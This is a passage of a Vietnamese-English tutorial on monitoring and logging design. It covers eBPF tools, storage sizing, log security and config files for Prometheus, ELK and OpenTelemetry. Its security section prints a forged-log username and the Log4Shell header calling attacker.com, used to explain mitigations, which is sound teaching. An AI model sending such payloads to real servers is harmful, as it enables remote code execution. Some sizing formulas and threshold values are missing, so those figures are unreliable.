# Install Pixie on K8s cluster
px deploy
# Run pre-built scripts (no code change needed)
px run px/http_data
# → Sees ALL HTTP requests in cluster, including method, path, latency, status
px run px/mysql_data
# → Sees ALL MySQL queries with timings
px run px/dns
# → Sees DNS resolution latencyMagic: Không có instrumentation code nào. Pixie attach eBPF probes vào kernel → intercept syscalls → reconstruct application protocols (HTTP, gRPC, MySQL, Redis…).
2.12.5 Continuous Profiling với Parca/Pyroscope
Profiling truyền thống chỉ chạy on-demand (perf, pprof). Continuous profiling capture profile mọi thời điểm với negligible overhead.
Always-on profile → flame graph → identify CPU hotspots, memory leaks, lock contention
ở mức code line, no extra instrumentation
Use case:
- Tìm CPU hotspot ở production (1% function chiếm 30% CPU)
- Phát hiện memory leak (function X đang giữ bộ nhớ tăng dần)
- Debug performance regression sau deploy (compare profile pre/post)
Tham chiếu:
- Brendan Gregg, BPF Performance Tools (O’Reilly 2019) — bible của eBPF observability
- Liz Rice, Learning eBPF (O’Reilly 2023) — beginner-friendly
- Cilium documentation: https://docs.cilium.io/
2.12.6 Khi nào dùng eBPF vs Application Instrumentation?
Need business-level metrics (revenue, user_id, feature_flag)?
├─ YES → Application instrumentation (OpenTelemetry SDK)
└─ NO → Need infrastructure/network visibility?
├─ YES → eBPF (Pixie, Cilium Hubble, Parca)
└─ Both → Use complementary
Best practice 2024-2026 stack:
- OpenTelemetry SDK — application traces với business attributes
- Prometheus — infrastructure metrics (CPU, memory, network)
- eBPF observability (Pixie/Hubble) — kernel/network deep dive
- Continuous profiling (Parca/Pyroscope) — code-level performance
- Structured events backend (Honeycomb, ClickHouse) — high-cardinality drill-down
3. Estimation — Ước lượng Storage cho Monitoring Stack
3.1 Metrics Storage (TSDB Sizing)
Assumptions:
| Thông số | Giá trị |
|---|---|
| Số services | 50 |
| Metrics per service | 200 (avg, bao gồm custom + runtime + infra) |
| Unique label combinations per metric | 10 (avg) |
| Scrape interval | 15 giây |
| Bytes per sample | 16 bytes (timestamp 8B + value 8B) |
| Retention | 30 ngày |
| Compression ratio | 1.37 bytes/sample (sau compression, Prometheus real-world) |
Tổng số time series:
Samples per day:
Storage per day (sau compression):
Storage cho 30 ngày retention:
Nhận xét: 100K series, 30 ngày retention → chỉ cần ~25GB. Prometheus single node hoàn toàn handle được. Nhưng nếu cardinality explosion lên 10M series → 2.3TB/30d → cần Thanos/Cortex/Mimir cho long-term storage.
3.2 Log Storage Sizing
Assumptions:
| Thông số | Giá trị |
|---|---|
| Tổng QPS (tất cả services) | 10,000 req/s |
| Log lines per request | 5 (avg: access log, app log, DB query log, etc.) |
| Average log line size | 500 bytes (structured JSON) |
| Retention | 90 ngày |
| Elasticsearch index overhead | 10% (inverted index, doc values) |
Log volume per day:
Sau Elasticsearch compression (~70% ratio, thực tế):
Storage cho 90 ngày retention:
Nhận xét: 10K QPS → cần ~64TB Elasticsearch storage cho 90 ngày. Đây là lý do:
- Log sampling cần thiết (không log 100% requests)
- Log levels quan trọng (production chỉ nên log WARN+ normally, DEBUG khi cần)
- Hot/Warm/Cold architecture trong Elasticsearch (SSD cho 7d, HDD cho 90d, S3 cho archive)
- Loki rẻ hơn vì không full-text index
3.3 Alert Threshold Calculation
Ví dụ: Tính threshold cho error rate alert dựa trên SLO
Assumptions:
- SLO: 99.9% availability (30 ngày)
- Error budget: 0.1% = 43.2 phút downtime / tháng
Burn rate thresholds:
| Alert | Burn Rate | Error Rate Threshold | Window |
|---|---|---|---|
| P1 | 14.4x | 5 phút | |
| P2 | 6x | 30 phút | |
| P3 | 1x | 6 giờ |
Latency threshold calculation:
Nếu SLO: 99% requests < 200ms (P99 latency target):
Alert khi burn rate > 14.4x:
→ Alert khi hơn 14.4% requests chậm hơn 200ms trong window 5 phút.
4. Security — Bảo mật trong Monitoring & Logging
4.1 Log Injection Attacks
Mô tả: Attacker chèn malicious content vào input, input đó được log, và khi admin xem log trong Kibana/web UI → trigger XSS hoặc làm sai lệch log.
Ví dụ tấn công:
# Attacker gửi username:
username = "admin\n2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin"
# Trong plaintext log, dòng giả xuất hiện như log thật:
2024-01-15 10:30:45 ERROR Login failed user=admin
2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin ← FAKE!
Log4Shell (CVE-2021-44228) — một trong những vulnerabilities nghiêm trọng nhất lịch sử:
# Attacker gửi header:
User-Agent: ${jndi:ldap://attacker.com/exploit}
# Log4j resolve JNDI lookup → download + execute malicious code
# → Remote Code Execution (RCE) trên server
Phòng chống:
| Biện pháp | Chi tiết |
|---|---|
| Structured logging | Dùng JSON — field values được escape tự động, không thể inject newlines |
| Input sanitization | Strip control characters (\n, \r, \t) trước khi log |
| Parameterized logging | logger.info("Login failed", {"user": user_input}) thay vì logger.info(f"Login failed user={user_input}") |
| Update dependencies | Log4j >= 2.17.1, patch JNDI lookup |
| Output encoding | Kibana/Grafana Loki auto-escape HTML, nhưng custom dashboards cần encode |
4.2 PII (Personally Identifiable Information) in Logs
Vấn đề: Logs chứa PII vi phạm GDPR, CCPA, PDPA (VN). Ví dụ:
{
"message": "Payment processed",
"user_email": "[email protected]",
"credit_card": "4111-1111-1111-1111",
"ip_address": "113.160.234.56",
"phone": "+84901234567"
}Giải pháp multi-layer:
| Layer | Technique | Ví dụ |
|---|---|---|
| Application | Redact/mask tại source code | credit_card: "****1111" |
| Pipeline | Logstash/Fluentd filter | mutate { gsub => ["message", "\d{4}-\d{4}-\d{4}-\d{4}", "****REDACTED****"] } |
| Storage | Field-level encryption trong ES | Encrypt user_email field |
| Access | RBAC trên Kibana | Chỉ Security team thấy full PII |
| Retention | Auto-delete PII sau 30 ngày | ILM policy trong Elasticsearch |
Logstash PII Filter Example:
filter {
# Mask credit card numbers
mutate {
gsub => [
"message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
"message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]",
"message", "\b\d{3}[-.]?\d{3}[-.]?\d{4}\b", "[PHONE_REDACTED]"
]
}
# Remove sensitive fields entirely
mutate {
remove_field => ["password", "secret", "token", "authorization"]
}
}4.3 Secure Log Transport
| Risk | Mitigation |
|---|---|
| Eavesdropping (nghe lén log in transit) | TLS 1.3 cho mọi log shipping (Filebeat → Logstash, Logstash → ES) |
| Tampering (sửa log) | Digital signature / HMAC cho log entries; Append-only storage |
| Log forging (tạo log giả) | Mutual TLS (mTLS) giữa log shipper và collector — chỉ trusted agents gửi log |
| Replay attack | Timestamp + nonce trong log entries |
Filebeat TLS config:
output.logstash:
hosts: ["logstash.internal:5044"]
ssl.enabled: true
ssl.certificate_authorities: ["/etc/pki/ca.crt"]
ssl.certificate: "/etc/pki/filebeat.crt"
ssl.key: "/etc/pki/filebeat.key"
ssl.verification_mode: "full" # Verify server cert4.4 Access Control for Monitoring Dashboards
Monitoring dashboards chứa thông tin cực kỳ nhạy cảm: architecture, traffic patterns, error details, internal endpoints. Nếu bị leak → attacker có blueprint của hệ thống.
| Control | Implementation |
|---|---|
| Authentication | SSO (SAML/OIDC) cho Grafana/Kibana — KHÔNG dùng default admin/admin |
| Authorization (RBAC) | Grafana: Viewer/Editor/Admin per org. Kibana: Spaces + Roles |
| Network | Dashboard chỉ accessible qua VPN hoặc internal network |
| Audit | Log mọi dashboard access, query execution, alert changes |
| Data masking | Dashboard cho non-security team không hiển thị IP, user_id chi tiết |
4.5 Audit Trail for Monitoring Changes
Mọi thay đổi trong monitoring system phải được audit:
| Action | Audit Record |
|---|---|
| Alert rule created/modified/deleted | Who, when, old value → new value |
| Dashboard modified | Git-based provisioning (Grafana as Code) |
| Silence/inhibit created | Who silenced, duration, reason |
| Log retention policy changed | Approval workflow required |
| Access granted to monitoring | RBAC change log |
Compliance requirement: SOC 2, PCI-DSS, HIPAA đều yêu cầu audit trail cho monitoring system changes. Nếu ai đó silence critical alert rồi thực hiện attack → audit trail là evidence.
5. DevOps — Full Monitoring Stack Setup
5.1 Prometheus + Grafana + Alertmanager Stack
docker-compose-monitoring.yml:
version: "3.8"
networks:
monitoring:
driver: bridge
volumes:
prometheus_data: {}
grafana_data: {}
alertmanager_data: {}
services:
# ============================================================
# PROMETHEUS - Metrics Collection & Storage
# ============================================================
prometheus:
image: prom/prometheus:v2.50.0
container_name: prometheus
restart: unless-stopped
ports:
- "9090:9090"
volumes:
- ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro
- ./prometheus/alert-rules.yml:/etc/prometheus/alert-rules.yml:ro
- prometheus_data:/prometheus
command:
- "--config.file=/etc/prometheus/prometheus.yml"
- "--storage.tsdb.path=/prometheus"
- "--storage.tsdb.retention.time=30d"
- "--storage.tsdb.retention.size=50GB"
- "--web.enable-lifecycle" # Enable /-/reload endpoint
- "--web.enable-admin-api" # Enable admin API (careful in prod!)
- "--storage.tsdb.min-block-duration=2h"
- "--storage.tsdb.max-block-duration=2h"
networks:
- monitoring
deploy:
resources:
limits:
memory: 4G
cpus: "2"
# ============================================================
# ALERTMANAGER - Alert Routing & Notification
# ============================================================
alertmanager:
image: prom/alertmanager:v0.27.0
container_name: alertmanager
restart: unless-stopped
ports:
- "9093:9093"
volumes:
- ./alertmanager/alertmanager.yml:/etc/alertmanager/alertmanager.yml:ro
- alertmanager_data:/alertmanager
command:
- "--config.file=/etc/alertmanager/alertmanager.yml"
- "--storage.path=/alertmanager"
- "--cluster.advertise-address=0.0.0.0:9093"
networks:
- monitoring
# ============================================================
# GRAFANA - Visualization & Dashboards
# ============================================================
grafana:
image: grafana/grafana:10.3.0
container_name: grafana
restart: unless-stopped
ports:
- "3000:3000"
environment:
- GF_SECURITY_ADMIN_USER=admin
- GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_ADMIN_PASSWORD:-changeme}
- GF_USERS_ALLOW_SIGN_UP=false
- GF_AUTH_ANONYMOUS_ENABLED=false
- GF_SERVER_ROOT_URL=https://grafana.example.com
- GF_SMTP_ENABLED=true
- GF_SMTP_HOST=smtp.gmail.com:587
- GF_LOG_LEVEL=warn
volumes:
- grafana_data:/var/lib/grafana
- ./grafana/provisioning/datasources:/etc/grafana/provisioning/datasources:ro
- ./grafana/provisioning/dashboards:/etc/grafana/provisioning/dashboards:ro
- ./grafana/dashboards:/var/lib/grafana/dashboards:ro
networks:
- monitoring
# ============================================================
# NODE EXPORTER - Host Metrics (CPU, Memory, Disk, Network)
# ============================================================
node-exporter:
image: prom/node-exporter:v1.7.0
container_name: node-exporter
restart: unless-stopped
ports:
- "9100:9100"
volumes:
- /proc:/host/proc:ro
- /sys:/host/sys:ro
- /:/rootfs:ro
command:
- "--path.procfs=/host/proc"
- "--path.rootfs=/rootfs"
- "--path.sysfs=/host/sys"
- "--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)"
networks:
- monitoring
# ============================================================
# cADVISOR - Container Metrics
# ============================================================
cadvisor:
image: gcr.io/cadvisor/cadvisor:v0.49.1
container_name: cadvisor
restart: unless-stopped
ports:
- "8080:8080"
volumes:
- /:/rootfs:ro
- /var/run:/var/run:ro
- /sys:/sys:ro
- /var/lib/docker/:/var/lib/docker:ro
- /dev/disk/:/dev/disk:ro
privileged: true
devices:
- /dev/kmsg:/dev/kmsg
networks:
- monitoringprometheus/prometheus.yml:
global:
scrape_interval: 15s # Default scrape interval
evaluation_interval: 15s # Rule evaluation interval
scrape_timeout: 10s
# Alertmanager configuration
alerting:
alertmanagers:
- static_configs:
- targets:
- alertmanager:9093
# Load alert rules
rule_files:
- "alert-rules.yml"
# Scrape targets
scrape_configs:
# Prometheus self-monitoring
- job_name: "prometheus"
static_configs:
- targets: ["localhost:9090"]
# Node Exporter (host metrics)
- job_name: "node-exporter"
static_configs:
- targets: ["node-exporter:9100"]
# cAdvisor (container metrics)
- job_name: "cadvisor"
static_configs:
- targets: ["cadvisor:8080"]
# Application services (example)
- job_name: "app-services"
metrics_path: "/metrics"
scrape_interval: 10s
static_configs:
- targets:
- "api-gateway:8080"
- "user-service:8081"
- "payment-service:8082"
- "order-service:8083"
labels:
env: "production"
# Kubernetes service discovery (khi dùng k8s)
# - job_name: "kubernetes-pods"
# kubernetes_sd_configs:
# - role: pod
# relabel_configs:
# - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
# action: keep
# regex: true
# - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
# action: replace
# target_label: __metrics_path__
# regex: (.+)alertmanager/alertmanager.yml:
global:
resolve_timeout: 5m
smtp_from: "[email protected]"
smtp_smarthost: "smtp.gmail.com:587"
smtp_auth_username: "[email protected]"
smtp_auth_password: "${SMTP_PASSWORD}"
smtp_require_tls: true
# Notification templates
templates:
- "/etc/alertmanager/templates/*.tmpl"
# Alert routing tree
route:
receiver: "slack-default"
group_by: ["alertname", "severity", "service"]
group_wait: 30s # Wait before sending first notification
group_interval: 5m # Wait between grouped notifications
repeat_interval: 4h # Repeat if not resolved
routes:
# P1 Critical → PagerDuty + Slack
- match:
severity: critical
receiver: "pagerduty-critical"
group_wait: 10s
repeat_interval: 1h
continue: true # Also send to next matching route
- match:
severity: critical
receiver: "slack-critical"
# P2 High → Slack #incidents
- match:
severity: high
receiver: "slack-incidents"
repeat_interval: 2h
# P3 Warning → Slack #alerts
- match:
severity: warning
receiver: "slack-alerts"
repeat_interval: 8h
# Security alerts → Security team
- match:
category: security
receiver: "security-team"
group_wait: 0s
repeat_interval: 30m
# Inhibition rules (suppress lower severity when higher fires)
inhibit_rules:
- source_match:
severity: "critical"
target_match:
severity: "warning"
equal: ["alertname", "service"]
- source_match:
severity: "critical"
target_match:
severity: "high"
equal: ["alertname", "service"]
# Receivers
receivers:
- name: "slack-default"
slack_configs:
- api_url: "${SLACK_WEBHOOK_DEFAULT}"
channel: "#monitoring"
title: '[{{ .Status | toUpper }}] {{ .GroupLabels.alertname }}'
text: '{{ range .Alerts }}*{{ .Annotations.summary }}*\n{{ .Annotations.description }}\n{{ end }}'
send_resolved: true
- name: "slack-critical"
slack_configs:
- api_url: "${SLACK_WEBHOOK_CRITICAL}"
channel: "#incidents"
title: '🚨 CRITICAL: {{ .GroupLabels.alertname }}'
text: >-
{{ range .Alerts }}
*Service*: {{ .Labels.service }}
*Summary*: {{ .Annotations.summary }}
*Runbook*: {{ .Annotations.runbook_url }}
{{ end }}
send_resolved: true
- name: "slack-incidents"
slack_configs:
- api_url: "${SLACK_WEBHOOK_INCIDENTS}"
channel: "#incidents"
send_resolved: true
- name: "slack-alerts"
slack_configs:
- api_url: "${SLACK_WEBHOOK_ALERTS}"
channel: "#alerts"
send_resolved: true
- name: "pagerduty-critical"
pagerduty_configs:
- service_key: "${PAGERDUTY_SERVICE_KEY}"
severity: critical
description: '{{ .GroupLabels.alertname }}: {{ .CommonAnnotations.summary }}'
details:
service: '{{ .GroupLabels.service }}'
severity: '{{ .GroupLabels.severity }}'
runbook: '{{ .CommonAnnotations.runbook_url }}'
- name: "security-team"
slack_configs:
- api_url: "${SLACK_WEBHOOK_SECURITY}"
channel: "#security-alerts"
pagerduty_configs:
- service_key: "${PAGERDUTY_SECURITY_KEY}"
severity: critical5.2 ELK Stack Docker Compose
docker-compose-elk.yml:
version: "3.8"
networks:
elk:
driver: bridge
volumes:
elasticsearch_data: {}
logstash_pipeline: {}
services:
# ============================================================
# ELASTICSEARCH - Log Storage & Search Engine
# ============================================================
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:8.12.0
container_name: elasticsearch
restart: unless-stopped
environment:
- discovery.type=single-node
- cluster.name=monitoring-cluster
- bootstrap.memory_lock=true
- "ES_JAVA_OPTS=-Xms2g -Xmx2g"
- xpack.security.enabled=true
- xpack.security.enrollment.enabled=true
- ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-changeme}
# ILM (Index Lifecycle Management) for log rotation
- xpack.monitoring.collection.enabled=true
ulimits:
memlock:
soft: -1
hard: -1
volumes:
- elasticsearch_data:/usr/share/elasticsearch/data
ports:
- "9200:9200"
networks:
- elk
deploy:
resources:
limits:
memory: 4G
# ============================================================
# LOGSTASH - Log Processing Pipeline
# ============================================================
logstash:
image: docker.elastic.co/logstash/logstash:8.12.0
container_name: logstash
restart: unless-stopped
volumes:
- ./logstash/pipeline/logstash.conf:/usr/share/logstash/pipeline/logstash.conf:ro
- ./logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
ports:
- "5044:5044" # Beats input
- "5000:5000" # TCP input (for direct log shipping)
- "9600:9600" # Monitoring API
environment:
- "LS_JAVA_OPTS=-Xms1g -Xmx1g"
depends_on:
- elasticsearch
networks:
- elk
# ============================================================
# KIBANA - Log Visualization
# ============================================================
kibana:
image: docker.elastic.co/kibana/kibana:8.12.0
container_name: kibana
restart: unless-stopped
environment:
- ELASTICSEARCH_HOSTS=http://elasticsearch:9200
- ELASTICSEARCH_USERNAME=kibana_system
- ELASTICSEARCH_PASSWORD=${KIBANA_PASSWORD:-changeme}
- xpack.security.enabled=true
- xpack.encryptedSavedObjects.encryptionKey=${KIBANA_ENCRYPTION_KEY}
ports:
- "5601:5601"
depends_on:
- elasticsearch
networks:
- elk
# ============================================================
# FILEBEAT - Log Shipper (chạy trên mỗi host)
# ============================================================
filebeat:
image: docker.elastic.co/beats/filebeat:8.12.0
container_name: filebeat
restart: unless-stopped
user: root
volumes:
- ./filebeat/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
- /var/lib/docker/containers:/var/lib/docker/containers:ro
- /var/log:/var/log:ro
depends_on:
- logstash
networks:
- elklogstash/pipeline/logstash.conf:
input {
beats {
port => 5044
ssl => true
ssl_certificate_authorities => ["/etc/pki/ca.crt"]
ssl_certificate => "/etc/pki/logstash.crt"
ssl_key => "/etc/pki/logstash.key"
ssl_verify_mode => "force_peer"
}
tcp {
port => 5000
codec => json_lines
}
}
filter {
# ============================
# Parse JSON logs
# ============================
if [message] =~ /^\{/ {
json {
source => "message"
target => "parsed"
}
mutate {
rename => {
"[parsed][level]" => "log_level"
"[parsed][service]" => "service_name"
"[parsed][trace_id]" => "trace_id"
"[parsed][span_id]" => "span_id"
"[parsed][duration_ms]" => "duration_ms"
}
}
}
# ============================
# PII Redaction (CRITICAL!)
# ============================
mutate {
gsub => [
# Credit card numbers
"message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
# Email addresses
"message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", "[EMAIL_REDACTED]",
# Vietnamese phone numbers
"message", "\b(0|\+84)\d{9,10}\b", "[PHONE_REDACTED]",
# SSN-like patterns
"message", "\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]"
]
}
# Remove explicitly sensitive fields
mutate {
remove_field => ["password", "secret", "token", "authorization", "cookie",
"[parsed][password]", "[parsed][secret]", "[parsed][token]"]
}
# ============================
# Enrich with geo data (optional)
# ============================
if [client_ip] {
geoip {
source => "client_ip"
target => "geo"
}
}
# ============================
# Log injection protection
# ============================
mutate {
gsub => [
# Remove ANSI escape codes
"message", "\e\[[0-9;]*m", "",
# Remove null bytes
"message", "\x00", ""
]
}
# ============================
# Add metadata
# ============================
mutate {
add_field => {
"environment" => "${ENV:production}"
"pipeline_version" => "2.0"
}
}
}
output {
elasticsearch {
hosts => ["elasticsearch:9200"]
user => "elastic"
password => "${ELASTIC_PASSWORD}"
ssl => true
index => "logs-%{[service_name]}-%{+YYYY.MM.dd}"
ilm_enabled => true
ilm_rollover_alias => "logs"
ilm_policy => "logs-lifecycle"
}
# Debug output (disable in production)
# stdout { codec => rubydebug }
}5.3 OpenTelemetry Collector Configuration
otel-collector-config.yml:
receivers:
# OTLP receiver (gRPC + HTTP)
otlp:
protocols:
grpc:
endpoint: 0.0.0.0:4317
http:
endpoint: 0.0.0.0:4318
cors:
allowed_origins: ["*"]
# Prometheus receiver (scrape Prometheus-format metrics)
prometheus:
config:
scrape_configs:
- job_name: "otel-collector"
scrape_interval: 15s
static_configs:
- targets: ["localhost:8888"]
# Host metrics receiver
hostmetrics:
collection_interval: 30s
scrapers:
cpu: {}
memory: {}
disk: {}
network: {}
load: {}
processors:
# Batch processor (buffer before export)
batch:
timeout: 5s
send_batch_size: 1024
send_batch_max_size: 2048
# Memory limiter (prevent OOM)
memory_limiter:
check_interval: 1s
limit_mib: 1024
spike_limit_mib: 256
# Attributes processor (add common attributes)
attributes:
actions:
- key: environment
value: "production"
action: upsert
- key: deployment.version
value: "v2.1.0"
action: upsert
# Filter processor (drop noisy/unwanted telemetry)
filter:
error_mode: ignore
traces:
span:
- 'attributes["http.target"] == "/health"'
- 'attributes["http.target"] == "/metrics"'
- 'attributes["http.target"] == "/readyz"'
# Tail sampling (keep interesting traces, sample boring ones)
tail_sampling:
decision_wait: 10s
num_traces: 50000
expected_new_traces_per_sec: 1000
policies:
# Always keep error traces
- name: errors-policy
type: status_code
status_code: {status_codes: [ERROR]}
# Always keep slow traces (> 1s)
- name: latency-policy
type: latency
latency: {threshold_ms: 1000}
# Sample 10% of successful traces
- name: probabilistic-policy
type: probabilistic
probabilistic: {sampling_percentage: 10}
exporters:
# Export traces to Jaeger
otlp/jaeger:
endpoint: jaeger:4317
tls:
insecure: true
# Export metrics to Prometheus
prometheus:
endpoint: 0.0.0.0:8889
resource_to_telemetry_conversion:
enabled: true
# Export logs to Loki
loki:
endpoint: http://loki:3100/loki/api/v1/push
default_labels_enabled:
exporter: true
job: true
# Debug exporter (development only)
# debug:
# verbosity: detailed
extensions:
health_check:
endpoint: 0.0.0.0:13133
zpages:
endpoint: 0.0.0.0:55679
service:
extensions: [health_check, zpages]
pipelines:
traces:
receivers: [otlp]
processors: [memory_limiter, filter, tail_sampling, batch, attributes]
exporters: [otlp/jaeger]
metrics:
receivers: [otlp, prometheus, hostmetrics]
processors: [memory_limiter, batch, attributes]
exporters: [prometheus]
logs:
receivers: [otlp]
processors: [memory_limiter, batch, attributes]
exporters: [loki]
telemetry:
logs:
level: info
metrics:
address: 0.0.0.0:88885.4 Grafana Dashboard Provisioning
grafana/provisioning/datasources/datasources.yml:
apiVersion: 1
datasources:
- name: Prometheus
type: prometheus
access: proxy
url: http://prometheus:9090
isDefault: true
editable: false
- name: Elasticsearch
type: elasticsearch
access: proxy
url: http://elasticsearch:9200
database: "logs-*"
basicAuth: true
basicAuthUser: "grafana_reader"
jsonData:
timeField: "@timestamp"
esVersion: "8.12.0"
logMessageField: "message"
logLevelField: "log_level"
- name: Jaeger
type: jaeger
access: proxy
url: http://jaeger:16686grafana/provisioning/dashboards/dashboards.yml:
apiVersion: 1
providers:
- name: "default"
orgId: 1
folder: "System Design Mastery"
type: file
disableDeletion: false
editable: true
options:
path: /var/lib/grafana/dashboards
foldersFromFilesStructure: trueExample Grafana Dashboard JSON (Golden Signals):
{
"dashboard": {
"title": "Golden Signals - Service Overview",
"tags": ["golden-signals", "sre", "production"],
"timezone": "browser",
"refresh": "10s",
"time": {"from": "now-1h", "to": "now"},
"panels": [
{
"title": "Request Rate (Traffic)",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 0, "y": 0},
"targets": [
{
"expr": "sum by (service) (rate(http_requests_total[5m]))",
"legendFormat": "{{service}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "reqps",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 2800},
{"color": "red", "value": 3500}
]
}
}
}
},
{
"title": "Error Rate (%)",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 12, "y": 0},
"targets": [
{
"expr": "sum by (service) (rate(http_requests_total{status=~\"5..\"}[5m])) / sum by (service) (rate(http_requests_total[5m])) * 100",
"legendFormat": "{{service}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "percent",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 0.1},
{"color": "red", "value": 1.0}
]
}
}
}
},
{
"title": "P99 Latency",
"type": "timeseries",
"gridPos": {"h": 8, "w": 12, "x": 0, "y": 8},
"targets": [
{
"expr": "histogram_quantile(0.99, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
"legendFormat": "{{service}} p99"
},
{
"expr": "histogram_quantile(0.50, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
"legendFormat": "{{service}} p50"
}
],
"fieldConfig": {
"defaults": {
"unit": "s",
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 0.2},
{"color": "red", "value": 0.5}
]
}
}
}
},
{
"title": "Resource Saturation",
"type": "gauge",
"gridPos": {"h": 8, "w": 12, "x": 12, "y": 8},
"targets": [
{
"expr": "100 - (avg by (instance) (rate(node_cpu_seconds_total{mode=\"idle\"}[5m])) * 100)",
"legendFormat": "CPU {{instance}}"
},
{
"expr": "(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100",
"legendFormat": "Memory {{instance}}"
}
],
"fieldConfig": {
"defaults": {
"unit": "percent",
"min": 0,
"max": 100,
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 70},
{"color": "red", "value": 90}
]
}
}
}
},
{
"title": "Error Budget Remaining",
"type": "stat",
"gridPos": {"h": 4, "w": 6, "x": 0, "y": 16},
"targets": [
{
"expr": "1 - ((1 - (sum(rate(http_requests_total{status!~\"5..\"}[30d])) / sum(rate(http_requests_total[30d])))) / (1 - 0.999)) ",
"legendFormat": "Error Budget"
}
],
"fieldConfig": {
"defaults": {
"unit": "percentunit",
"thresholds": {
"steps": [
{"color": "red", "value": null},
{"color": "yellow", "value": 0.25},
{"color": "green", "value": 0.50}
]
}
}
}
}
]
}
}5.5 PagerDuty Integration Summary
┌──────────┐ ┌──────────────┐ ┌───────────┐ ┌──────────┐
│Prometheus │───►│ Alertmanager │───►│ PagerDuty │───►│ On-call │
│ (fires │ │ (routes, │ │ │ │ Engineer │
│ alert) │ │ groups, │ │ - Phone │ │ │
│ │ │ dedup) │ │ - SMS │ │ Ack / │
│ │ │ │ │ - Push │ │ Resolve │
└──────────┘ └──────────────┘ │ - Email │ └──────────┘
│ │
│ Escalation│
│ Policy │
└───────────┘
Quy trình:
- Prometheus evaluates alert rule → fires alert
- Alertmanager receives, groups, deduplicates
- Alertmanager sends to PagerDuty via Events API v2
- PagerDuty creates incident → notifies on-call per escalation policy
- Engineer acknowledges → starts investigation
- Engineer resolves → PagerDuty updates status
- Alertmanager sends resolved → PagerDuty auto-resolves
6. Code — Instrumentation Examples
6.1 Python: Flask App with Prometheus Metrics + Structured Logging + OpenTelemetry
"""
Full observability instrumentation for a Python Flask service.
Includes: Prometheus metrics, structured logging, OpenTelemetry tracing.
"""
import time
import logging
import json
import sys
from datetime import datetime, timezone
from flask import Flask, request, g
from prometheus_client import (
Counter, Histogram, Gauge, Info,
generate_latest, CONTENT_TYPE_LATEST
)
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.instrumentation.flask import FlaskInstrumentor
from opentelemetry.instrumentation.requests import RequestsInstrumentor
from opentelemetry.propagate import set_global_textmap
from opentelemetry.propagators.b3 import B3MultiFormat
from opentelemetry.sdk.resources import Resource
# ============================================================
# 1. STRUCTURED LOGGING SETUP
# ============================================================
class StructuredJsonFormatter(logging.Formatter):
"""
Custom JSON formatter cho structured logging.
Mọi log output đều là JSON — dễ parse bởi Logstash/Fluentd/Loki.
"""
def format(self, record):
log_entry = {
"timestamp": datetime.now(timezone.utc).isoformat(),
"level": record.levelname,
"logger": record.name,
"message": record.getMessage(),
"service": "payment-service",
"instance": "payment-7b4f9d8c-x2k9p",
"version": "2.1.0",
}
# Add trace context if available
span = trace.get_current_span()
if span and span.is_recording():
ctx = span.get_span_context()
log_entry["trace_id"] = format(ctx.trace_id, "032x")
log_entry["span_id"] = format(ctx.span_id, "016x")
# Add request context if available
if hasattr(g, "request_id"):
log_entry["request_id"] = g.request_id
# Add extra fields
if hasattr(record, "extra_fields"):
log_entry.update(record.extra_fields)
# Add exception info
if record.exc_info and record.exc_info[0]:
log_entry["exception"] = {
"type": record.exc_info[0].__name__,
"message": str(record.exc_info[1]),
"traceback": self.formatException(record.exc_info),
}
return json.dumps(log_entry, default=str)
def setup_logging():
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(StructuredJsonFormatter())
root_logger = logging.getLogger()
root_logger.handlers.clear()
root_logger.addHandler(handler)
root_logger.setLevel(logging.INFO)
return logging.getLogger("payment-service")
logger = setup_logging()
# ============================================================
# 2. OPENTELEMETRY TRACING SETUP
# ============================================================
def setup_tracing(app: Flask):
resource = Resource.create({
"service.name": "payment-service",
"service.version": "2.1.0",
"deployment.environment": "production",
})
provider = TracerProvider(resource=resource)
# Export traces to OTel Collector via OTLP/gRPC
otlp_exporter = OTLPSpanExporter(
endpoint="otel-collector:4317",
insecure=True, # Use TLS in production!
)
provider.add_span_processor(BatchSpanProcessor(otlp_exporter))
trace.set_tracer_provider(provider)
# Auto-instrument Flask
FlaskInstrumentor().instrument_app(app)
# Auto-instrument outgoing HTTP requests
RequestsInstrumentor().instrument()
return trace.get_tracer("payment-service")
# ============================================================
# 3. PROMETHEUS METRICS SETUP
# ============================================================
# Service info
SERVICE_INFO = Info("service", "Service information")
SERVICE_INFO.info({
"name": "payment-service",
"version": "2.1.0",
"language": "python",
})
# Request metrics (RED method)
REQUEST_COUNT = Counter(
"http_requests_total",
"Total HTTP requests",
["method", "path", "status"]
)
REQUEST_DURATION = Histogram(
